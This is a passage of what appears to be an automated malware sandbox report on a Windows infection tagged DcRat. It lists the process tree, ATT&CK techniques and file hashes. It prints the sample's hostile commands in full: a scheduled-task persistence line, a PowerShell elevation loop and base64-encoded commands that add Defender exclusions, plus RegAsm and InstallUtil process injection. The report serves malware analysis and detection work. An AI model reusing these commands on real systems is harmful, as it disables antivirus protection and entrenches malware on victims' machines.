C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1836 -ip 18361⤵PID:4676
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F1⤵
- DcRat
- Creates scheduled task(s)
PID:3200
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2332 -ip 23321⤵PID:1296
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2332 -ip 23321⤵PID:4548
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2332 -ip 23321⤵PID:2712
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2332 -ip 23321⤵PID:2572
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2332 -ip 23321⤵PID:932
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # Elevate privileges if (-not (IsAdministrator)) { $proc = New-Object System.Diagnostics.Process $proc.StartInfo.WindowStyle = 'Hidden' $proc.StartInfo.FileName = [System.Diagnostics.Process]::GetCurrentProcess().MainModule.FileName $exclusionPaths = '${env:ProgramData}','${env:AppData}','${env:SystemDrive}\\' $proc.StartInfo.Arguments = '-Command "Add-MpPreference -ExclusionPath ""' + ($exclusionPaths -join ',') + '"""' $proc.StartInfo.UseShellExecute = $true $proc.StartInfo.Verb = 'runas' $proc.StartInfo.CreateNoWindow = $true try { $proc.Start() | Out-Null $proc.WaitForExit() | Out-Null [Environment]::Exit(1) } catch [System.ComponentModel.Win32Exception] { if ($AdminRightsRequired) { continue } else { break } } } else { break } } } function IsAdministrator { $identity = [System.Security.Principal.WindowsIdentity]::GetCurrent() $principal = New-Object System.Security.Principal.WindowsPrincipal($identity) return $principal.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator) } Get-Win"1⤵PID:2920
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2332 -ip 23321⤵PID:3932
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4512 -ip 45121⤵PID:1800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4512 -ip 45121⤵PID:2248
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4512 -ip 45121⤵PID:3268
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4512 -ip 45121⤵PID:3932
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4512 -ip 45121⤵PID:1440
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 4512 -ip 45121⤵PID:4068
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4512 -ip 45121⤵PID:1640
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4512 -ip 45121⤵PID:2308
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4512 -ip 45121⤵PID:2920
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 492 -ip 4921⤵PID:844
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2332 -ip 23321⤵PID:4684
-
C:\Windows\SysWOW64\chcp.comchcp 12511⤵PID:4360
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 5761⤵
- Program crash
PID:4860
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2332 -ip 23321⤵PID:1268
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1144 -ip 11441⤵PID:228
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1144 -ip 11441⤵PID:4944
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 32 -ip 321⤵PID:3708
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1832 -ip 18321⤵PID:3484
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1384 -ip 13841⤵PID:1164
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1384 -ip 13841⤵PID:1668
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 1384 -ip 13841⤵PID:1344
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1384 -ip 13841⤵PID:488
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1384 -ip 13841⤵PID:1308
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 1384 -ip 13841⤵PID:3676
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1384 -ip 13841⤵PID:4464
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 1384 -ip 13841⤵PID:5060
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1384 -ip 13841⤵PID:2204
-
C:\Users\Admin\AppData\Local\Temp\3EE8.exeC:\Users\Admin\AppData\Local\Temp\3EE8.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3692
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2668
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 1384 -ip 13841⤵PID:1800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1384 -ip 13841⤵PID:1136
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1384 -ip 13841⤵PID:4256
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1384 -ip 13841⤵PID:2512
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1384 -ip 13841⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4628
-
C:\Users\Admin\AppData\Local\Temp\6444.exeC:\Users\Admin\AppData\Local\Temp\6444.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4616 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵PID:1448
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵PID:3432
-
-
C:\Users\Admin\AppData\Local\Temp\684C.exeC:\Users\Admin\AppData\Local\Temp\684C.exe1⤵PID:3384
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
- Loads dropped DLL
- Checks processor information in registry
PID:1784
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵PID:964
-
-
C:\Users\Admin\AppData\Local\Temp\7127.exeC:\Users\Admin\AppData\Local\Temp\7127.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:712 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"2⤵PID:3148
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABTAHQAcgBpAG4AZwBJAGQAcwAuAGUAeABlADsA1⤵PID:2344
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:3600
-
C:\Users\Admin\AppData\Roaming\msedge.exeC:\Users\Admin\AppData\Roaming\msedge.exe1⤵
- Executes dropped EXE
PID:852
-
C:\Users\Admin\AppData\Local\Detail\iytzgl\StringIds.exeC:\Users\Admin\AppData\Local\Detail\iytzgl\StringIds.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1644 -
C:\Users\Admin\AppData\Local\Detail\iytzgl\StringIds.exeC:\Users\Admin\AppData\Local\Detail\iytzgl\StringIds.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1772 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe3⤵
- Suspicious use of SetThreadContext
PID:4944 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe4⤵PID:2956
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe4⤵
- Executes dropped EXE
PID:4464
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\E36A.exeC:\Users\Admin\AppData\Local\Temp\E36A.exe1⤵
- Executes dropped EXE
PID:1664 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1664 -s 10882⤵
- Program crash
PID:2312
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1664 -s 6522⤵
- Program crash
PID:2580
-
-
C:\Users\Admin\AppData\Local\Temp\E80E.exeC:\Users\Admin\AppData\Local\Temp\E80E.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:4988
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1664 -ip 16641⤵PID:1484
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1664 -ip 16641⤵PID:3120
-
C:\Users\Admin\AppData\Local\Temp\F1F.exeC:\Users\Admin\AppData\Local\Temp\F1F.exe1⤵
- Executes dropped EXE
PID:4628 -
C:\Users\Admin\AppData\Local\Temp\onefile_4628_133510487012479434\stub.exeC:\Users\Admin\AppData\Local\Temp\F1F.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3180 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"3⤵PID:1416
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4340
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"3⤵PID:4752
-
C:\Windows\system32\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
PID:2204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:1676
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:2932
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABTAHQAcgBpAG4AZwBJAGQAcwAuAGUAeABlADsA1⤵PID:4528
-
C:\Users\Admin\AppData\Local\Temp\pwivssxb.exeC:\Users\Admin\AppData\Local\Temp\pwivssxb.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3560 -
C:\Users\Admin\AppData\Local\Temp\pwivssxb.exeC:\Users\Admin\AppData\Local\Temp\pwivssxb.exe2⤵
- Executes dropped EXE
PID:3548
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 3980 -ip 39801⤵PID:2976
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBlAHMAcwBhAGcAZQBcAFMAdQBwAHAAbwByAHQAcwBEAHkAbgBhAG0AaQBjAFAAYQByAHQAaQB0AGkAbwBuAHMALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUAIAAtAEYAbwByAGMAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE0AZQBzAHMAYQBnAGUAXABTAHUAcABwAG8AcgB0AHMARAB5AG4AYQBtAGkAYwBQAGEAcgB0AGkAdABpAG8AbgBzAC4AZQB4AGUA1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3384
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1384 -ip 13841⤵PID:4844
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 1384 -ip 13841⤵PID:2008
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4364 -ip 43641⤵PID:1624
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4564 -ip 45641⤵PID:3432
-
C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exeC:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2976 -
C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exeC:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2068 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe3⤵
- Suspicious use of SetThreadContext
PID:2152 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe4⤵PID:2584
-
-
-
-
C:\Users\Admin\AppData\Roaming\msedge.exeC:\Users\Admin\AppData\Roaming\msedge.exe1⤵
- Executes dropped EXE
PID:2820
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1384 -ip 13841⤵PID:3388
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1384 -ip 13841⤵PID:3164
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2004 -ip 20041⤵PID:364
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2004 -ip 20041⤵PID:3800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2652 -ip 26521⤵PID:1460
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4636 -ip 46361⤵PID:5528
-
C:\Users\Admin\AppData\Roaming\msedge.exeC:\Users\Admin\AppData\Roaming\msedge.exe1⤵PID:2044
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3996 -ip 39961⤵PID:5752
-
C:\Users\Admin\AppData\Roaming\swaviieC:\Users\Admin\AppData\Roaming\swaviie1⤵PID:5900
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 3722⤵
- Program crash
PID:1632
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5900 -ip 59001⤵PID:5540
-
C:\Users\Admin\AppData\Local\Temp\CBD4.exeC:\Users\Admin\AppData\Local\Temp\CBD4.exe1⤵PID:5132
-
C:\Users\Admin\AppData\Local\Temp\CBD4.exeC:\Users\Admin\AppData\Local\Temp\CBD4.exe2⤵PID:4256
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\D77D.dll1⤵PID:5732
-
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\D77D.dll2⤵PID:5168
-
-
C:\Users\Admin\AppData\Local\Temp\D9FF.exeC:\Users\Admin\AppData\Local\Temp\D9FF.exe1⤵PID:1764
-
C:\Users\Admin\AppData\Local\Temp\E431.exeC:\Users\Admin\AppData\Local\Temp\E431.exe1⤵PID:5792
-
C:\Users\Admin\AppData\Local\Temp\户砵圵䙢㝅"C:\Users\Admin\AppData\Local\Temp\户砵圵䙢㝅"2⤵PID:5368
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 2763⤵
- Program crash
PID:5448
-
-
-
C:\Users\Admin\AppData\Local\Temp\509.exeC:\Users\Admin\AppData\Local\Temp\509.exe1⤵PID:6136
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 9722⤵PID:7524
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 11002⤵PID:6120
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5368 -ip 53681⤵PID:5280
-
C:\Users\Admin\AppData\Local\Temp\1342.exeC:\Users\Admin\AppData\Local\Temp\1342.exe1⤵PID:5540
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 11442⤵PID:9152
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1384 -ip 13841⤵PID:2820
-
C:\Users\Admin\AppData\Roaming\msedge.exeC:\Users\Admin\AppData\Roaming\msedge.exe1⤵PID:5136
-
C:\Users\Admin\AppData\Local\Temp\B918.exeC:\Users\Admin\AppData\Local\Temp\B918.exe1⤵PID:6924
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe2⤵PID:7800
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 6136 -ip 61361⤵PID:7764
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6136 -ip 61361⤵PID:8100
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1384 -ip 13841⤵PID:1388
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5540 -ip 55401⤵PID:5836
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5540 -ip 55401⤵PID:8700
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1384 -ip 13841⤵PID:8512
-
C:\Users\Admin\AppData\Roaming\msedge.exeC:\Users\Admin\AppData\Roaming\msedge.exe1⤵PID:7588
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1384 -ip 13841⤵PID:7484
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Impair Defenses
3Disable or Modify System Firewall
1Disable or Modify Tools
2Modify Registry
3Scripting
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
11KB
MD5a33e5b189842c5867f46566bdbf7a095
SHA1e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA2565abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b
-
Filesize
46KB
MD502d2c46697e3714e49f46b680b9a6b83
SHA184f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA51260348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac
-
Filesize
46KB
MD514ccc9293153deacbb9a20ee8f6ff1b7
SHA146b4d7b004ff4f1f40ad9f107fe7c7e3abc9a9f3
SHA2563195ce0f7aa2eae2b21c447f264e2bd4e1dc5208353ac72d964a750de9a83511
SHA512916f2178be05dc329461d2739271972238b22052b5935883da31e6c98d2697bd2435c9f6a2d1fcafb4811a1d867c761055532669aac2ea1a3a78c346cdeba765
-
Filesize
1KB
MD5f664757a0169fb48091b3c65694e3651
SHA1d4cd80c6ed94c6fb9be95daea477c602feb51a0d
SHA256cbfc513b61a2c7b818829b752e8e54319c6a11c2c7e6c8ea5e7dd4427554586e
SHA5125d35b09b6de52bad52dacab83e52b785b419832efc035794b541a2e2c4a5f3dd5e93a79ebd60efdb3490fbbb51e19986ecefef225b42ea1a7b20b21e86732051
-
Filesize
8KB
MD52a27da0220e1d462637ef29840ef5cb3
SHA1987624f73b713bae7e4a033bc3c8a97b6c20605d
SHA256e069b319b7294be93d65a2befd273ef1e1f0d8fc592edbee68b973e6f2b60b3f
SHA512f45b6c3e48fb244cba604c8d7b1fb018d5ab76480e4fa1e900dfc27991c087a13296a918606a52832f9084e8e4ea42fdb6a5c655626afc2ea14bc5fc24df5583
-
Filesize
634KB
MD5e25f35b00253b3054123f1d363842cda
SHA1fec10c418779a2a6741f86c8593cf547369c8d9b
SHA2565adc0b98bb590ce96b6a6862bf56a9266bf923babd39e588dce7efa97a250049
SHA5125afccb1bfc41ca3793e1ce37d69921ae8281377217dbcc7a58975f94359a6d060b065742ff7db192beb957d190964a4a416420470cb9be6ed2830ac46179f38b
-
Filesize
93KB
MD50049f29bcfd134f3595aa7bc3060c6cb
SHA1994d34faf3f4173914bd0d0a8b26f0f25bb8c287
SHA2569424ed44077d97261e8822b49e9871f772e81e74f789bc3d312c816b8b206d7a
SHA512270c09fb6ced684180982b34c138af9a380bf102cd11ab40268a825398deb1804a4fa020dc3370a459aab217d20f2c46029abdd8407bc3a58215909e6a85905e
-
Filesize
78KB
MD5490e77e241c560e33345ec142f56d3f4
SHA1075dc48881adc033c9fdef8691b0d548b3ac0791
SHA2560836a9e91f1a5a5cfda068b2cbd1a821b500d436c5e02c1851b6fbccb18b5342
SHA512890ea6f1f32a6cb36b4b4740a1c9c18611928366a8576ac875cba3e0c22a7ea20308a71a73e941ff34127f4a0f4676c6b32b594ed4209f986a06bcb208df93e4
-
Filesize
22KB
MD592ab63ddf351f9612498f01778a6866a
SHA1f967faff25a9ef70f0171d323563ddbe84e2b4a7
SHA2569be2b96d4a82c35b43f0d0ed6b7cef4367aeebd780ff862b50ee2a3bc2b8b54b
SHA51220b79c627f3d0c37a1d15bda91103b2b6aeefb5cf2116140442deb43283ff2aeaabb592a39cbc0f0c321be0ab8ddba058f89dab12efeeb503b3f832b08e49e70
-
Filesize
5KB
MD52b13ba8d3fa6f7e1788ac3a03e9082a0
SHA165fb8a28063270d3e9e5b3b12968cdb1a5081a58
SHA256f24436cc817f8e3464b259bfbb1ff6693b3716058c1511f8cdb867c156ca06af
SHA5121d55a66973cb7b464f2f8d0b42d0f8e01f4c8d1d24f65855b9273815a712a3e808fbebbac4121e285367613fa7ccf889aeaf336566d6c712f72583151b96ddd1
-
Filesize
9KB
MD58af0207b7f8da292fe8f2bf3fb74bf2c
SHA1fbe5f6c9ddc3b094435d63937439cf038ab684e0
SHA256fbbe35394ab135a835769860ddbe1e372a8bc2910fe443fb5e7b7d4870ce65aa
SHA5129c615387a39082733ba7539e02a0015674d8abd75db89a78190c03f3ec22cd20e5fa9eca610a6304aa0494f825d381720573a7a7d64b0347ab0a0d7e2a3461f4
-
Filesize
439KB
MD55ff1fca37c466d6723ec67be93b51442
SHA134cc4e158092083b13d67d6d2bc9e57b798a303b
SHA2565136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062
SHA5124802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546
-
Filesize
11KB
MD5f363f0d6e9230c8b039f91187307d0ec
SHA1828335e1f1601754f032bce2700c56c87d0c1783
SHA256670b9396d0eca4d086cc01d1aa1790f28b0c86c635304300616061b4b9f9d3e4
SHA5124ce87c08908624af24171e3e0a7ad48fb9dc46c0d831d9cc81fc889fbb018fe27cc4161edf75f4180ed15a32c8ec2ac189391e7f624ca0177de7bb740b46ff12
-
Filesize
234KB
MD52f9217769912ea962aeda4dcf4110900
SHA14f224b936fb9352f4b90540e39d62fd65a75a9b2
SHA2566e579ee307189adfa4c3d87e20684bcffce6a4a1710d8867c785488850d6c70d
SHA512a17e2b94a9dfc9773051ee4e41644618eddb6c007df66b30bd96281168b4ac02c5815d62b220834b5b2547de27d18d73ffcd41fd2e468d5291ae55c2e004401e
-
Filesize
28KB
MD56ac8b8f9023b00a588a788cc042e2be1
SHA165d0b9a3e0f1de3e531612a7d76da3af03250a46
SHA256353917939ebc90682eec12387244d1739580ea94c7899a1a6790a85941dc6023
SHA512c9cdb03d6bb9a9ba82613da4b14643444738a0e18df6fdea3f4bccc92c837fb687abb39a463e66a89a0a67c8d7b917e033e4acedd5e651ddcf76dd929844e7e0
-
Filesize
42KB
MD5cf0e64f512e8d0a04464a160daa5f5c6
SHA13a3fea215a590c0c0c3831dfa1f427c2d479f10c
